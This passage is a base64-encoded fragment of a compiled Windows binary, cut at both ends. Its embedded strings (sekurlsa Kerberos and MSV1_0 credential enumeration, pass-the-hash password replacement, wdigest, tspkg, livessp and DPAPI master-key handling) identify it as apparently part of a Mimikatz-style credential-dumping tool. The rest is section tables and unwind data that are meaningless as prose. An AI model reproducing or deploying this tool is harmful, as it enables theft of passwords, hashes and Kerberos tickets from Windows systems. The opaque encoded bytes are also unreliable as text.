AAAAlAHcAWgAJACUAdwBaAAkAAAAAAAAAAAAKAAkAIAAqACAAVQBzAGUAcgBuAGEAbQBlACAAOgAgACUAdwBaAAoACQAgACoAIABEAG8AbQBhAGkAbgAgACAAIAA6ACAAJQB3AFoACgAJACAAKgAgAFAAYQBzAHMAdwBvAHIAZAAgADoAIAAAAAAATABVAEkARAAgAEsATwAKAAAAAAAAAAAACgAJACAAKgAgAFIAbwBvAHQASwBlAHkAIAAgADoAIAAAAAAAAAAAAAoACQAgACoAIAAlADAAOAB4ACAAOgAgAAAAAAAAAAAACgAJACAAIAAgACoAIABMAFMAQQAgAEkAcwBvAGwAYQB0AGUAZAAgAEQAYQB0AGEAOgAgACUALgAqAFMAAAAAAAoACQAgACAAIAAgACAAVQBuAGsALQBLAGUAeQAgACAAOgAgAAAAAAAKAAkAIAAgACAAIAAgAEUAbgBjAHIAeQBwAHQAZQBkADoAIAAAAAAACgAJAAkAIAAgACAAUwBTADoAJQB1ACwAIABUAFMAOgAlAHUALAAgAEQAUwA6ACUAdQAAAAAAAAAAAAAAAAAAAAoACQAJACAAIAAgADAAOgAwAHgAJQB4ACwAIAAxADoAMAB4ACUAeAAsACAAMgA6ADAAeAAlAHgALAAgADMAOgAwAHgAJQB4ACwAIAA0ADoAMAB4ACUAeAAsACAARQA6AAAAAAAAAAAALAAgADUAOgAwAHgAJQB4AAAAAAAAAAAACgAJACAAIAAgACoAIAB1AG4AawBEAGEAdABhADEAIAA6ACAAAAAAAAoACQAgACAAIAAgACAAdQBuAGsARABhAHQAYQAyACAAOgAgAAAAAAAKAAkAIABbACUAMAA4AHgAXQAAAAAAAABkAHAAYQBwAGkAcwByAHYALgBkAGwAbAAAAAAAAAAAAAkAIABbACUAMAA4AHgAXQAKAAkAIAAqACAARwBVAEkARAAgACAAIAAgACAAIAA6AAkAAAAAAAAACgAJACAAKgAgAFQAaQBtAGUAIAAgACAAIAAgACAAOgAJAAAAAAAAAAoACQAgACoAIABNAGEAcwB0AGUAcgBLAGUAeQAgADoACQAAAAAAAAAKAAkAIAAqACAAcwBoAGEAMQAoAGsAZQB5ACkAIAA6AAkAAAAAAAAACgAJAEsATwAAAAAAAAAAAGsAZQByAGIAZQByAG8AcwAuAGQAbABsAAAAAAAAAAAAVABpAGMAawBlAHQAIABHAHIAYQBuAHQAaQBuAGcAIABTAGUAcgB2AGkAYwBlAAAAQwBsAGkAZQBuAHQAIABUAGkAYwBrAGUAdAAgAD8AAABUAGkAYwBrAGUAdAAgAEcAcgBhAG4AdABpAG4AZwAgAFQAaQBjAGsAZQB0AAAAAAAKAAkARwByAG8AdQBwACAAJQB1ACAALQAgACUAcwAAAAoACQAgACoAIABLAGUAeQAgAEwAaQBzAHQAIAA6AAoAAAAAAAAAAABkAGEAdABhACAAYwBvAHAAeQAgAEAAIAAlAHAAAAAAAAoAIAAgACAAXABfACAAJQBzACAAAAAAAC0APgAgAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBzAGUAawB1AHIAbABzAGEAXwBlAG4AdQBtAF8AawBlAHIAYgBlAHIAbwBzAF8AYwBhAGwAbABiAGEAYwBrAF8AcAB0AGgAIAA7ACAAawB1AGwAbABfAG0AXwBtAGUAbQBvAHIAeQBfAGMAbwBwAHkAIAAoADAAeAAlADAAOAB4ACkACgAAAAoAIAAgACAAXABfACAAKgBQAGEAcwBzAHcAbwByAGQAIAByAGUAcABsAGEAYwBlACAALQA+ACAAAAAAAAAAAABuAHUAbABsAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBzAGUAawB1AHIAbABzAGEAXwBrAGUAcgBiAGUAcgBvAHMAXwBlAG4AdQBtAF8AdABpAGMAawBlAHQAcwAgADsAIABrAHUAbABsAF8AbQBfAGYAaQBsAGUAXwB3AHIAaQB0AGUARABhAHQAYQAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAAAAAAoACQAgACAAIABMAFMAQQAgAFMAZQBzAHMAaQBvAG4AIABLAGUAeQAgACAAIAA6ACAAMAB4ACUAMAA4AHgAIAAtACAAJQBzAAAAAAAAAAAAWwAlAHgAOwAlAHgAXQAtACUAMQB1AC0AJQB1AC0AJQAwADgAeAAtACUAdwBaAEAAJQB3AFoALQAlAHcAWgAuACUAcwAAAAAAWwAlAHgAOwAlAHgAXQAtACUAMQB1AC0AJQB1AC0AJQAwADgAeAAuACUAcwAAAAAAbABpAHY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kCAAQNAcAEDIMcAEdDAAddAsAHWQKAB1UCQAdNAgAHTIZ8BfgFcABDwYAD2QJAA80CAAPUgtwASAMACBkDQAgVAwAIDQLACAyHPAa4BjQFsAUcAEZCAAZZAgAGVQHABk0BgAZMhVwAR0IAB1kCgAdVAkAHTQIAB1SGXABHAwAHGQMABxUCwAcNAoAHDIY8BbgFNASwBBwARgGABhkBwAYNAYAGDIUcAEKBAAKNAgAClIGcAEVCAAVdAoAFWQJABU0CAAVUhHgARkKABl0CQAZZAgAGVQHABk0BgAZMhXgAQ8GAA9UCQAPNAgAD1ILcAESCAASVAoAEjQIABIyDuAMcAtgAQoEAAo0BgAKMgZwARkKABl0DgAZZA0AGTQMABlyFfAT4BHAARQIABRkCAAUVAcAFDQGABQyEHABGQoAGXQLABlkCgAZVAkAGTQIABlSFeABGwoAG3QRABtkEAAbNA8AG5IU8BLgEFABHQwAHXQNAB1kDAAdVAsAHTQKAB1SGfAX4BXAARwLABx0MAAcVC8AHDQuABwBKgAV8BPgEcAAAAEUBgAUNA0AFFINcAxgC1ABGAgAGGQWABg0FQAY8g7gDHALUAEkCgAkNBkAJNId8BvgGdAXwBVwFGATUAEfDAAfdBcAH2QVAB80FAAf0hjwFuAU0BLAEFABHAwAHGQVABxUEwAcNBIAHLIY8BbgFNASwBBwARcIABdkDwAXVA4AFzQNABeSE3ABJAoAJDQUACSSHfAb4BnQF8AVcBRgE1ABBgIABlICMAEIAgAIcgQwARgKABhkFAAYVBMAGDQSABjSFPAS4BBwARwMABxkEgAcVBEAHDQQABySGPAW4BTQEsAQcAEQBgAQZAsAEDQKABByDHABGwoAG3QUABtkEwAbNBIAG9IU8BLgEFABEAYAEFQLABA0CgAQcgxgAR0MAB10CwAdZAoAHVQJAB00CAAdMhnwF+AV0AEKAgAKMgYwAQ8GAA9kBwAPNAYADzILcAETBAATNAYAEzIPcAEUCgAUNA0AFDIQ8A7gDNAKwAhwB2AGUAEPBgAPVAkADzQIAA9SC2ABIw0AI3QiACNkIQAjNCAAIwEaABjwFuAU0BLAEFAAAAEZCgAZNBYAGdIV8BPgEdAPwA1wDGALUAEfCQAf4hvwGeAX0BXAE3ASYBFQEDAAAAEZCgAZ5BMAGXQSABl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